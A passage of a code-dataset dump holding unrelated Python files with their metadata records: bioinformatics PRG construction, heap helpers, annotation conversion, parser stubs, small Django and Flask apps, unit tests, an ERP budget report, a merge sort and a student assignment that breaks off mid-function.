(or gained?) some sequences in the process of clustering\"\n assert (\n len(return_id_lists) > 1\n ), \"should have some alternate alleles, not only one sequence, this is a non-match interval\"\n return return_id_lists\n\n def get_sub_alignment_by_list_id(self, list_of_id, interval=None):\n list_records = [record for record in self.alignment if record.id in list_of_id]\n sub_alignment = MultipleSeqAlignment(list_records)\n if interval:\n sub_alignment = sub_alignment[:, interval[0] : interval[1] + 1]\n return sub_alignment\n\n def get_prg(self):\n prg = \"\"\n # last_char = None\n # skip_char = False\n\n for interval in self.all_intervals:\n if interval in self.match_intervals:\n # WLOG can take first sequence as all same in this interval\n sub_alignment = self.alignment[:, interval[0] : interval[1] + 1]\n seqs = get_interval_seqs(sub_alignment)\n assert len(seqs) > 0\n seq = seqs[0]\n prg += seq\n\n else:\n # Define variant site number and increment for next available\n site_num = self.site\n self.site += 2\n variant_seqs = []\n\n # Define the variant seqs to add\n if (self.nesting_level == self.max_nesting) or (\n interval[1] - interval[0] <= self.min_match_length\n ):\n # Have reached max nesting level, just add all variants in interval.\n logging.debug(\n \"Have reached max nesting level or have a small variant site, so add all variant \"\n \"sequences in interval.\"\n )\n sub_alignment = self.alignment[:, interval[0] : interval[1] + 1]\n logging.debug(\n \"Variant seqs found: %s\"\n % list(\n remove_duplicates(\n [str(record.seq) for record in sub_alignment]\n )\n )\n )\n variant_seqs = get_interval_seqs(sub_alignment)\n logging.debug(\"Which is equivalent to: %s\" % variant_seqs)\n else:\n # divide sequences into subgroups and define prg for each subgroup.\n logging.debug(\n \"Divide sequences into subgroups and define prg for each subgroup.\"\n )\n recur = True\n list_list_id = self.kmeans_cluster_seqs_in_interval(interval)\n list_sub_alignments = [\n self.get_sub_alignment_by_list_id(list_id, interval)\n for list_id in list_list_id\n ]\n num_classes_in_partition = len(list_list_id)\n\n if len(list_sub_alignments) == self.num_seqs:\n logging.debug(\n \"Partition does not group any sequences together, all seqs get unique class in partition\"\n )\n recur = False\n elif interval[0] not in list(self.subAlignedSeqs.keys()):\n self.subAlignedSeqs[interval[0]] = []\n logging.debug(\n \"subAlignedSeqs now has keys: %s\",\n list(self.subAlignedSeqs.keys()),\n )\n else:\n logging.debug(\n \"subAlignedSeqs already had key %d in keys: %s. This shouldn't happen.\",\n interval[0],\n list(self.subAlignedSeqs.keys()),\n )\n\n while len(list_sub_alignments) > 0:\n sub_alignment = list_sub_alignments.pop(0)\n sub__aligned_seq = AlignedSeq(\n msa_file=self.msa_file,\n alignment_format=self.alignment_format,\n max_nesting=self.max_nesting,\n nesting_level=self.nesting_level + 1,\n min_match_length=self.min_match_length,\n site=self.site,\n alignment=sub_alignment,\n interval=interval,\n )\n variant_seqs.append(sub__aligned_seq.prg)\n self.site = sub__aligned_seq.site\n\n if recur:\n # logging.debug(\"None not in snp_scores - try to add sub__aligned_seq to list in\n # dictionary\")\n self.subAlignedSeqs[interval[0]].append(sub__aligned_seq)\n # logging.debug(\"Length of subAlignedSeqs[%d] is %d\", interval[0],\n # len(self.subAlignedSeqs[interval[0]]))\n assert num_classes_in_partition == len(variant_seqs), (\n \"I don't seem to have a sub-prg sequence for all parts of the partition - there are %d \"\n \"classes in partition, and %d variant seqs\"\n % (num_classes_in_partition, len(variant_seqs))\n )\n assert len(variant_seqs) > 1, \"Only have one variant seq\"\n\n if len(variant_seqs) != len(list(remove_duplicates(variant_seqs))):\n print(\"variant_seqs: \")\n for s in variant_seqs:\n print(s)\n print(\", \")\n\n assert len(variant_seqs) == len(\n list(remove_duplicates(variant_seqs))\n ), \"have repeat variant seqs\"\n\n # Add the variant seqs to the prg\n prg += \"%s%d%s\" % (\n self.delim_char,\n site_num,\n self.delim_char,\n ) # considered making it so start of prg was not delim_char,\n # but that would defeat the point if it\n while len(variant_seqs) > 1:\n prg += variant_seqs.pop(0)\n prg += \"%s%d%s\" % (self.delim_char, site_num + 1, self.delim_char)\n prg += variant_seqs.pop()\n prg += \"%s%d%s\" % (self.delim_char, site_num, self.delim_char)\n\n return prg\n\n @property\n def max_nesting_level_reached(self):\n max_nesting = []\n if self.subAlignedSeqs == {}:\n logging.debug(\n \"self.subAlignedSeqs == {} at nesting level %d for interval %s\",\n self.nesting_level,\n self.interval,\n )\n max_nesting.append(self.nesting_level)\n else:\n logging.debug(\n \"self.subAlignedSeqs.keys(): %s\", list(self.subAlignedSeqs.keys())\n )\n logging.debug(\n \"self.subAlignedSeqs[self.subAlignedSeqs.keys()[0]]: %s\",\n self.subAlignedSeqs[list(self.subAlignedSeqs.keys())[0]],\n )\n for interval_start in list(self.subAlignedSeqs.keys()):\n logging.debug(\"interval start: %d\", interval_start)\n for subaseq in self.subAlignedSeqs[interval_start]:\n logging.debug(\n \"type of subAlignedSeqs object in list: %s\", type(subaseq)\n )\n recur = subaseq.max_nesting_level_reached\n logging.debug(\n \"recur max level nesting returned: %d, which has type %s\",\n recur,\n type(recur),\n )\n max_nesting.append(recur)\n m = max(max_nesting)\n logging.debug(\"found the max of %s is %d\", max_nesting, m)\n return m\n","sub_path":"make_prg/make_prg_from_msa.py","file_name":"make_prg_from_msa.py","file_ext":"py","file_size_in_byte":30862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"178924057","text":"\"\"\"\nUtilities for using heapq\n\"\"\"\nimport heapq\nimport logging as root_logger\nlogging = root_logger.getLogger(__name__)\n\nclass HeapWrapper:\n \"\"\" Utility to wrap an ordinal with data to use in the heap \"\"\"\n def __init__(self, ordinal, data, desc=None):\n self.ordinal = ordinal\n self.data = data\n self.desc = desc\n\n def __lt__(self, other):\n assert(isinstance(other, HeapWrapper))\n return self.ordinal < other.ordinal\n\n def unwrap(self):\n \"\"\" Unwrap the data \"\"\"\n return (self.ordinal, self.data)\n\n def __repr__(self):\n if self.desc is None:\n return \"{} - {}\".format(self.ordinal, repr(self.data))\n else:\n return \"{} - {} : {}\".format(self.ordinal, self.desc, repr(self.data))\n\n\ndef pop_while_same(heap):\n \"\"\" Pop while the head is equal to the first value poppped \"\"\"\n assert(all([isinstance(x, HeapWrapper) for x in heap]))\n first_vert, first_edge = heapq.heappop(heap).unwrap()\n if first_edge is None:\n return (first_vert, [])\n\n collected = (first_vert, [first_edge])\n count = 1\n while bool(heap) and heap[0].ordinal == first_vert:\n data = heapq.heappop(heap).data\n if data is not None:\n collected[1].append(data)\n count += 1\n assert(len(collected[1]) == count)\n return collected\n","sub_path":"cairo_utils/heaputils.py","file_name":"heaputils.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"444919731","text":"import os\nimport json\nfrom os import listdir, getcwd\nfrom os.path import join\n\n# classes in the correct order\nclasses = ['bicycle', 'bus', 'car', 'motorcycle', 'person', 'rider', 'traffic light', 'traffic sign', 'train', 'truck']\n\n#path to json file\npath = '/home/schober/cityscape_dataset/annotations/instancesonly_filtered_gtFine_train.json'\n\n# output folder path\nout_path = '/home/schober/cityscape_dataset/annotations/darknet_labels_train/'\n\n# box form[x,y,w,h]\ndef convert(size, box):\n dw = size[0]\n dh = size[1]\n w = box[2]\n h = box[3]\n x = (box[0] + 0.5 * w)/dw\n y = (box[1] + 0.5 * h)/dh\n w = w / dw\n h = h / dh\n return (x, y, w, h)\n\n\ndef convert_annotation():\n with open(path, 'r') as f:\n data = json.load(f)\n for item in data['images']:\n image_id = item['id']\n file_name = item['file_name']\n width = item['width']\n height = item['height']\n value = filter(lambda item1: item1['image_id'] == image_id, data['annotations'])\n subfolder_list = file_name.split('/')[:-1]\n subfolder = '/'.join(subfolder_list)\n out_folder = os.path.join(out_path, subfolder)\n print(out_folder)\n if not os.path.exists(out_folder):\n os.makedirs(out_folder)\n outfile = open(path + '%s.txt' % (file_name[:-4]), 'a+')\n for item2 in value:\n category_id = item2['category_id']\n value1 = list(filter(lambda item3: item3['id'] == category_id, data['categories']))\n name = value1[0]['name']\n if name == 'rider':\n name = 'person'\n class_id = classes.index(name)\n box = item2['bbox']\n bb = convert((width, height), box)\n outfile.write(str(class_id) + \" \" + \" \".join([str(a) for a in bb]) + '\\n')\n outfile.close()\n\n\nif __name__ == '__main__':\n convert_annotation()\n","sub_path":"coco_to_darknet.py","file_name":"coco_to_darknet.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"2085997","text":"from grammar import Slot, Grammar, Sentence, NonTerminal, Terminal, Symbol\n\nimport pdb\n\n\n\n############################### Binary Subtree Representation ###############################\n\nBSR = tuple[Slot, int, int, int] #(g:Slot, l:int, k:int, r:int)\n\n\ndef find_roots(start:NonTerminal, Y:set[BSR], length:int) -> set[BSR]:\n \"\"\"Find all BSRs in Y that are roots of the parse tree\n \n Args:\n start (NonTerminal): The start symbol of the grammar\n Y (set[BSR]): The BSR set\n length (int): The length of the input string\n\n Returns:\n set[BSR]: The set of BSRs that are roots of the parse tree\n \"\"\"\n\n result = set()\n for y in Y:\n g, l, k, r = y\n if g.X == start and l == 0 and r == length and len(g.beta) == 0:\n result.add(y)\n\n return result\n\n#TODO: broken\ndef find_children(Y: set[BSR], y0: BSR) -> list[BSR]:\n g0, l0, k0, r0 = y0\n lefts, rights = [], []\n for y in Y:\n g, l, k, r = y\n if l == l0 and r == k0: #TODO: other checks...\n lefts.append(y)\n elif l == k0 and r == r0: #TODO: other checks...\n rights.append(y)\n\n if r0 - k0 == 1:\n #tau[k0:r0]\n assert isinstance(g0.alpha[-1], Terminal)\n rights.append(g0.alpha[-1])\n \n pdb.set_trace()\n # return children\n\n\ndef build_tree(Y: set[BSR], node: BSR) -> list[tuple[BSR, list]]:\n children = find_children(Y, node)\n tree = []\n for child in children:\n subtree = build_tree(Y, child)\n tree.append((child, subtree))\n return tree\n\ndef bsr_tree_str(X:NonTerminal, Y:set[BSR], length:int) -> str:\n roots = find_roots(X, Y, length)\n if len(roots) == 0:\n return \"No roots found in the BSR set.\"\n\n trees = [build_tree(Y, root) for root in roots]\n pdb.set_trace()\n # return tree_to_string(tree)\n\n\n\n\n\n\n############################### Shared Packed Parse Forest ################################\n\nclass SPPF:\n def __init__(self):\n self.nodes: set[SPPFNode] = set()\n self.edges: dict[SPPFNode, list[SPPFNode]] = {}\n # add node labelled (S, 0, n)\n # add node labelled (X ::= α·δ, k)\n # check if there are any extendable leaf nodes\n # (μ, i, j) is an extendable leaf node\n # node labelled (Ω, i, j)\n # add an edge from y to the node (Ω, i, j) \n\nclass SPPFNode:...\n #ambiguous nodes...\n #...\n\ndef extractSPPF(*args, **kwargs):\n raise NotImplementedError\n\ndef sppf_tree_str(*args, **kwargs):\n raise NotImplementedError\n\n\"\"\"\nextractSPPF (Υ, Γ)\n{\n G := empty graph\n let S be the start symbol of Γ\n let n be the extent of Υ\n if Υ has an element of the form (S ::= α, 0, k, n)\n {\n create a node labelled (S, 0, n) in G\n while G has an extendable leaf node\n {\n let w = (μ, i, j) be an extendable leaf node of G\n if (μ is a nonterminal X in Γ)\n {\n for each (X ::= γ, i, k, j) ∈ Υ \n { \n mkPN(X ::= γ·, i, k, j, G) \n } \n }\n else\n {\n suppose μ is X ::= α·δ\n if (|α| = 1)\n {\n mkPN(X ::= α·δ, i, i, j, G)\n }\n else for each (α, i, k, j) ∈ Υ \n { \n mkPN(X ::= α·δ, i, k, j, G) \n } \n } \n } \n }\n return G\n}\n\nmkPN(X ::= α·δ, i, k, j, G)\n{\n make a node y in G labelled (X ::= α·δ, k)\n if (α = ϵ)\n {\n mkN(ϵ, i, i, y, G)\n }\n if (α = βx, where |x| = 1)\n {\n mkN(x, k, j, y, G)\n if (|β| = 1)\n {\n mkN(β, i, k, y, G)\n }\n if (|β| > 1)\n {\n mkN(X ::= β·xδ, i, k, y, G) \n }\n }\n}\n\nmkN (Ω, i, j, y, G)\n{\n if there is not a node labelled (Ω, i, j) in G make one\n add an edge from y to the node (Ω, i, j) \n}\n\"\"\"\n","sub_path":"src/compiler/python-tests/gll/trees.py","file_name":"trees.py","file_ext":"py","file_size_in_byte":4022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"649292714","text":"from django.http import HttpResponse\n\n\ndef hello(request):\n html_str = \"\"\"\n Django test\n

Here is Mark's Django demo

\n

You are at Django Demo index

\n \"\"\"\n return HttpResponse(html_str)\n","sub_path":"DjangoDemo/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"52271914","text":"#!/usr/bin/env python\n#coding=UTF-8\n\nimport re, sys\n\nmd5_re = re.compile('^.*\"([0-9A-Fa-f]{32})\".*$')\nhashes = []\ncount = 0\n\nwith open(\"NSRLFile.txt\") as fh:\n line = fh.readline()\n while line:\n elements = line.split(\",\")\n if len(elements) >= 2:\n match = md5_re.match(elements[1])\n if match:\n hashes.append(match.group(1))\n line = fh.readline()\n\nhashes.sort()\nwith open(\"src/NSRLFile.txt\", \"w\") as fh:\n for entry in hashes:\n fh.write(entry + \"\\n\")\n","sub_path":"denistify.py","file_name":"denistify.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"269605955","text":"# Copyright 2017 - Nokia Networks\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport webob\n\nfrom glare.api.middleware import version_negotiation\nfrom glare.common import exception as exc\nfrom glare.tests.unit import base\n\n\nclass TestContextMiddleware(base.BaseTestCase):\n MIME_TYPE = 'application/vnd.openstack.artifacts-'\n\n def _build_request(self, accept, path_info):\n req = webob.Request.blank(path_info)\n req.accept = accept\n return req\n\n def _build_middleware(self):\n return version_negotiation.GlareVersionNegotiationFilter(None)\n\n def test_version_request(self):\n _LINKS = [{\n \"rel\": \"describedby\",\n \"type\": \"text/html\",\n \"href\": \"http://docs.openstack.org/\",\n }]\n for path_info in ('/', '/versions'):\n expected = {'versions': [\n {\n 'version': '1.0',\n 'status': 'STABLE',\n 'links': _LINKS,\n 'media-type': 'application/vnd.openstack.artifacts-1.0',\n },\n {\n 'version': '1.1',\n 'status': 'EXPERIMENTAL',\n 'links': _LINKS,\n 'media-type': 'application/vnd.openstack.artifacts-1.1',\n }]\n }\n req = self._build_request(self.MIME_TYPE + '1.0', path_info)\n res = self._build_middleware().process_request(req)\n self.assertEqual(expected, res.json_body)\n\n def test_wrong_version(self):\n req = self._build_request(self.MIME_TYPE + 'INVALID', '/artifacts')\n self.assertRaises(exc.BadRequest,\n self._build_middleware().process_request, req)\n\n def test_too_big_version(self):\n req = self._build_request(self.MIME_TYPE + '10000.0', '/artifacts')\n self.assertRaises(exc.InvalidGlobalAPIVersion,\n self._build_middleware().process_request, req)\n\n def test_latest_version(self):\n req = self._build_request(self.MIME_TYPE + 'latest', '/artifacts')\n self._build_middleware().process_request(req)\n self.assertEqual('1.1', req.api_version_request.get_string())\n\n def test_version_unknown(self):\n req = self._build_request('UNKNOWN', '/artifacts')\n self._build_middleware().process_request(req)\n self.assertEqual('1.0', req.api_version_request.get_string())\n\n def test_response(self):\n res = webob.Response()\n req = self._build_request('1.0', '/artifacts')\n mw = self._build_middleware()\n mw.process_request(req)\n mw.process_response(res, req)\n self.assertIn('openstack-api-version', res.headers)\n self.assertEqual('artifact 1.0', res.headers['openstack-api-version'])\n self.assertIn('Vary', res.headers)\n self.assertEqual('openstack-api-version', res.headers['Vary'])\n","sub_path":"glare/tests/unit/middleware/test_version_negotiations.py","file_name":"test_version_negotiations.py","file_ext":"py","file_size_in_byte":3439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"44721277","text":"from flask import Flask, render_template, request\nimport json\nimport requests\nfrom threading import Thread\nimport time\nimport datetime\n'''import RPi.GPIO as GPIO\n#GPIO.cleanup()\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(21, GPIO.OUT)\nGPIO.output(21, GPIO.LOW)\n\nimport w1thermsensor\nsensor = w1thermsensor.W1ThermSensor()\nimport Adafruit_DHT as dht\nDHT_PIN_NR = 2\ntemp = sensor.get_temperature()\nprint(temp)\nh,t = dht.read_retry(dht.DHT22, DHT_PIN_NR)\nprint(h, t)\n'''\napp = Flask(__name__)\n\ndataDict = {\n \"out1\": 0,\n \"tempOut\": 0,\n \"tempIn\": 0,\n \"humIn\": 0,\n \"temperatureTable\": []\n}\nprint(dataDict)\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/getData')\ndef getData():\n global dataDict\n jsn = json.dumps(dataDict)\n print(jsn)\n return str(jsn)\n\n@app.route('/outputStateOn')\ndef outputStateOn():\n GPIO.output(21, GPIO.HIGH)\n dataDict[\"out1\"] = 1\n print(\"state 1\")\n return \"state 1\"\n\n@app.route('/outputStateOff')\ndef outputStateOff():\n GPIO.output(21, GPIO.LOW)\n dataDict[\"out1\"] = 0\n print(\"state 0\")\n return \"state 0\"\n\n@app.route('/nodeMcu', methods=['GET', 'POST'])\ndef nodeMcu():\n requestStr = \"http://192.168.1.4?\" + \\\n \"pwm5=\" + request.form.get('pwm5') + \"&\" \\\n \"pwm6=\" + request.form.get('pwm6') + \"&\" \\\n \"pwm7=\" + request.form.get('pwm7')\n print(requests.get(requestStr).content)\n return \"node mcu ok\"\n\ndef holdTemperatureValue(tempIn, tempOut, timeStr):\n global dataDict\n print(dataDict[\"temperatureTable\"])\n if len(dataDict[\"temperatureTable\"]) >= 12:\n dataDict[\"temperatureTable\"].pop(0)\n\n dataDict[\"temperatureTable\"].append([timeStr, tempOut, tempIn])\n\n #print(dataDict[\"temperatureTable\"])\n\nactualHour = -1\ndef measure():\n global dataDict\n global actualHour\n while True:\n dataDict[\"tempOut\"] = round(sensor.get_temperature(), 1)\n h,t = dht.read_retry(dht.DHT22, DHT_PIN_NR)\n dataDict[\"tempIn\"] = round(t, 1)\n dataDict[\"humIn\"] = round(h, 1)\n dataDict[\"out1\"] = GPIO.input(21)\n\n if actualHour != datetime.datetime.now().hour:\n actualHour = datetime.datetime.now().hour\n hourStr = str(actualHour) + \":00\"\n holdTemperatureValue(dataDict[\"tempIn\"], dataDict[\"tempOut\"], hourStr)\n\n #print(dataDict)\n time.sleep(10)\n\nif __name__ == '__main__':\n Thread(target=measure).start()\n app.run(debug=True, use_reloader=False, host='0.0.0.0')\n #app.run(debug=True, host='0.0.0.0')\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"579841779","text":"# validate Filters\nflt_dict = {'fiscal_year': 'Fiscal Year', 'period': 'Period'}\nfor f in flt_dict:\n if not filter_values.get(f):\n msgprint(\"Please Select \" + cstr(flt_dict[f]))\n raise Exception\n\n# Get Values from fliters\nfiscal_year = filter_values.get('fiscal_year')\nperiod = filter_values.get('period')\nunder = \"GL Entry\"\nbased_on = \"Cost Center\"\n\n#add distributed id field\ncol = []\ncol.append([based_on,'Date','150px',''])\ncol.append(['Budget Allocated','Currency','150px',''])\ncol.append(['Distribution Id','Date','150px',''])\n\nfor c in col:\n colnames.append(c[0])\n coltypes.append(c[1])\n colwidths.append(c[2])\n coloptions.append(c[3])\n \n col_idx[c[0]] = len(colnames)-1\n\ndef make_child_lst(based_on,name):\n rg = sql(\"select lft, rgt from `tab%s` where name = '%s'\"%(based_on,name))\n ch_name = sql(\"select name from `tab%s` where lft between %d and %d\"%(based_on,int(rg[0][0]),int(rg[0][1])))\n chl ='('\n flag = 1\n for c in ch_name:\n if flag == 1:\n chl += \"'%s'\"%c[0]\n flag = 2\n else:\n chl +=\",'%s'\"%c[0]\n\n chl +=\")\"\n return chl\n\n\n\nfor r in res:\n \n cond1 =\" t1.fiscal_year ='%s' and t1.parent=t2.name and t1.parenttype = '%s' and t1.docstatus !=2\"\n \n q = \"select t1.name from `tabBudget Detail` t1, `tab%s` t2 where \"+cond1+\" and t2.name = '%s'\"\n ch = sql(q%(based_on,fiscal_year,based_on,r[0].strip()))\n q1 = \"select sum(t1.budget_allocated) from `tabBudget Detail` t1, `tab%s` t2, `tabAccount` t3 where \"\n cond2 = \" t3.is_pl_account = 'Yes' and t3.debit_or_credit = 'Debit' and t3.name = t1.account and t1.docstatus != 2 and \"\n if ch:\n \n qur = q1+cond2+cond1+\" and t2.name = '%s'\"\n ret_amt = sql(qur%(based_on,fiscal_year,based_on,r[0].strip()))\n \n\n #---------------------------------------------------------------- \n else:\n node_lst = make_child_lst(based_on,r[0].strip())\n qur = q1+cond1+' and '+cond2+\" t2.name in %s\"\n\n ret_amt = sql(qur%(based_on,fiscal_year,based_on,node_lst)) \n\n #---------------------------------------------------------------- \n ret_dis_id = sql(\"select distribution_id from `tab%s` where name = '%s'\"%(based_on,r[0].strip()))\n\n target_amt = ret_amt and flt(ret_amt[0][0]) or 0\n dis_id = ret_dis_id and ret_dis_id[0][0] or ''\n\n r.append(target_amt)\n r.append(dis_id)\n \n\n\n# Set required field names \nbased_on_fn = 'cost_center'\n\ndate_fn = 'posting_date' \n\nmon_list = []\n\ndata = {'start_date':0, 'end_date':1}\n\ndef make_month_list(append_colnames, start_date, mon_list, period, colnames, coltypes, colwidths, coloptions, col_idx):\n count = 1\n if period == 'Quarterly' or period == 'Half Yearly' or period == 'Annual': mon_list.append([str(start_date)])\n for m in range(12):\n # get last date\n last_date = str(sql(\"select LAST_DAY('%s')\" % start_date)[0][0])\n \n # make mon_list for Monthly Period\n if period == 'Monthly' :\n mon_list.append([start_date, last_date])\n # add months as Column names\n month_name = sql(\"select MONTHNAME('%s')\" % start_date)[0][0]\n append_colnames(str(month_name)[:3], colnames, coltypes, colwidths, coloptions, col_idx)\n \n # get start date\n start_date = str(sql(\"select DATE_ADD('%s',INTERVAL 1 DAY)\" % last_date)[0][0])\n \n # make mon_list for Quaterly Period\n if period == 'Quarterly' and count % 3 == 0: \n mon_list[len(mon_list) - 1 ].append(last_date)\n # add Column names\n append_colnames('Q '+ str(count / 3), colnames, coltypes, colwidths, coloptions, col_idx)\n if count != 12: mon_list.append([start_date])\n \n # make mon_list for Half Yearly Period\n if period == 'Half Yearly' and count % 6 == 0 :\n mon_list[len(mon_list) - 1 ].append(last_date)\n # add Column Names\n append_colnames('H'+str(count / 6), colnames, coltypes, colwidths, coloptions, col_idx)\n if count != 12: mon_list.append([start_date])\n\n # make mon_list for Annual Period\n if period == 'Annual' and count % 12 == 0:\n mon_list[len(mon_list) - 1 ].append(last_date)\n # add Column Names\n append_colnames('', colnames, coltypes, colwidths, coloptions, col_idx)\n count = count +1\n\ndef append_colnames(name, colnames, coltypes, colwidths, coloptions, col_idx):\n col = ['Target', 'Actual', 'Variance']\n for c in col:\n n = str(name) and ' (' + str(name) +')' or ''\n colnames.append(str(c) + n)\n coltypes.append('Currency')\n colwidths.append('150px')\n coloptions.append('')\n col_idx[str(c) + n ] = len(colnames) - 1\n\n\n\n# make default columns\n#coltypes[col_idx[based_on]] = 'Link'\n#coloptions[col_idx[based_on]]= based_on\n\n# get start date\nstart_date = get_value('Fiscal Year', fiscal_year, 'year_start_date')\nif not start_date:\n msgprint(\"Please Define Year Start Date for Fiscal Year \" + str(fiscal_year))\n raise Exception\nstart_date = start_date.strftime('%Y-%m-%d')\n\n# make month list and columns\nmake_month_list(append_colnames, start_date, mon_list, period, colnames, coltypes, colwidths, coloptions, col_idx)\n\n\nbc_obj = get_obj('Budget Control')\nfor r in res:\n count = 0\n\n for idx in range(3, len(colnames), 3):\n cidx = 2\n\n # ================= Calculate Target ==========================================\n r.append(bc_obj.get_monthly_budget( r[cidx], fiscal_year, mon_list[count][data['start_date']], mon_list[count][data['end_date']], r[cidx-1]))\n \n #================== Actual Amount =============================================\n actual = 0\n\n ch = make_child_lst(based_on,r[0].strip())\n \n actual = sql(\"select sum(ifnull(t1.debit,0))-sum(ifnull(t1.credit,0)) from `tabGL Entry` t1, `tabAccount` t2 where t2.is_pl_account = 'Yes' and t1.is_cancelled = 'No' and t1.cost_center in %s and t2.debit_or_credit = 'Debit' and t1.posting_date between '%s' and '%s' and t1.account = t2.name\"%(ch, mon_list[count][data['start_date']], mon_list[count][data['end_date']]))\n \n #----------------------------------------------------------\n actual = flt(actual[0][0])\n r.append(actual)\n # ================ Variance ===================================================\n r.append(r[idx] - r[idx + 1])\n count = count +1","sub_path":"accounts/search_criteria/budget_variance_report/budget_variance_report.py","file_name":"budget_variance_report.py","file_ext":"py","file_size_in_byte":6307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"31194539","text":"def merge(left, right) :\n alist = []\n while len(left) != 0 and len(right) != 0:\n if left[0] < right[0] :\n alist.append(left[0])\n left.remove(left[0])\n else :\n alist.append(right[0])\n right.remove(right[0])\n\n if len(right) == 0 :\n alist += left\n else :\n alist += right\n return alist\n\ndef mergeSort(alist) :\n if len(alist) > 1 :\n mid = len(alist) // 2\n left = alist[:mid]\n right = alist[mid:]\n\n left = mergeSort(left)\n right = mergeSort(right)\n return merge(left, right)\n return alist\n\nalist1 = [10, 9, 8, 7, 6, 5, 4, 3, 2, 1]\nalist2 = [7, 9, 4, 2, 1, 3, 5, 10, 6, 8]\nalist3 = [2, 1, 3, 4, 5, 6, 7, 8, 9, 10]\n\nprint(alist1)\nprint(mergeSort(alist1))\n\nprint(alist2)\nprint(mergeSort(alist2))\n\nprint(alist3)\nprint(mergeSort(alist3))","sub_path":"Doo/알고리즘/MergeSort.py","file_name":"MergeSort.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"564278011","text":"# Family name: Hrithik Shah\n# Student number: 300069290\n# Course: IT1 1120 \n# Assignment Number 1\n\nimport math\nimport turtle\nimport random\n\n###################################################################\n# Question 1\n###################################################################\n\ndef pythagorean_pair (a,b):\n \"\"\"\n (number,number-->number)\n Description: Takes two numbers and uses the Pythagorean Theorem to\n check if the hypotenuse is an integer\n Precondition: a,b have to be positive numbers\n \"\"\"\n c = math.sqrt((a*a) + (b*b))\n return c%1 == 0\n\n\n###################################################################\n# Question 2\n###################################################################\n\ndef mh2kh (s):\n \"\"\"\n (number-->number)\n Description: Takes speed in miles/h and converts to km/h\n Precondition: none\n \"\"\"\n return s*1.609344\n\n\n###################################################################\n# Question 3\n###################################################################\n\ndef in_out(xs,ys,side):\n \"\"\"\n (number, number, number-->boolean)\n Description: Checks if a point is in a given square\n Precondition: side is non-negative number\n \"\"\"\n x=float(input(\"Give me a x-coordinate: \"))\n y=float(input(\"Give me a y-coordinate: \"))\n print(x>=xs and x<=xs+side and y>=ys and y<=ys+side)\n\n\n###################################################################\n# Question 4\n###################################################################\n\ndef safe(n):\n \"\"\"\n (number-->boolean)\n Description: determine if a number is safe (does not contain a 9 or doesn't divide by 9)\n Precondition: n is non-negative, maximum two-digit integer\n \"\"\"\n return ((n//10 != 9 and n%10 != 9) and n%9 != 0)\n\n\n###################################################################\n# Question 5\n###################################################################\n\ndef quote_maker(quote, name, year):\n \"\"\"\n (string, string, string-->string)\n Description: outputs a quote in a specified format\n Precondition: quote has has to be a string, name has to be a string and year has to be an int\n \"\"\"\n return ('In '+str(year)+', a person called '+name+' said: \"'+quote+'\"')\n\n\n###################################################################\n# Question 6\n###################################################################\n\ndef quote_displayer():\n \"\"\"\n (nothing-->string)\n Description: asked user for a quote, name and year, and outputs it in a specific format\n Precondition: none\n \"\"\"\n quote=str(input(\"Give me a quote: \"))\n name=str(input(\"Who said that? \"))\n year= str(input(\"What year did she/he say that? \"))\n return ('In '+year+', a person called '+name+' said: \"'+quote+'\"')\n\n###################################################################\n# Question 7\n###################################################################\n\ndef rps_winner ():\n \"\"\"\n ask user for two strings --> print boolean values\n Description: Figures out who wins in a game of rock paper scizzors\n Preconditions: inputs must be strings\n \"\"\"\n p1 = str(input(\"What choice did player 1 make? \\nType one of the following options: rock, paper, scissors: \"))\n p2 = str(input(\"What choice did player 2 make? \\nType one of the following options: rock, paper, scissors: \"))\n print (\"Player 1 wins. That is \"+str((((p1 == 'rock') and (p2 == 'scissors')) or ((p1 == 'scissors') and (p2 == 'paper')) or ((p1 == 'paper') and (p2 == 'rock')))))\n print (\"It is a tie. That is not \"+ str(not(p1 == p2)))\n\n###################################################################\n# Question 8\n###################################################################\n\ndef fun (x):\n \"\"\"\n number --> number\n Description: takes a number and uses an equation to come up with a value for y.\n Preconditions: x must be a positive integer\n \"\"\"\n y = (math.log(x+3,10))/4\n return y\n\n###################################################################\n# Question 9\n###################################################################\n\ndef ascii_name_plaque (name):\n \"\"\"\n string --> string\n Description: uses a name to create a name plaque\n Preconditions: must be a string\n \"\"\"\n length = len(name)\n plaque = \"*****\" + \"*\"*length + \"*****\\n\" + \"* \" + \" \"*length + \" *\\n\" + \"* __\" + name + \"__ *\\n\" + \"* \" + \" \"*length + \" *\\n\" + \"*****\" + \"*\"*length + \"*****\\n\"\n print (plaque)\n\n###################################################################\n# Question 10\n###################################################################\n\ndef my_fun_drawing ():\n \"\"\"\n nothing --> drawing\n Description: uses Turtle graphics to draw a fractal tree\n Preconditions: none\n \"\"\"\n screen = turtle.Screen()\n drawer = turtle.Turtle()\n drawer.speed(\"fastest\")\n 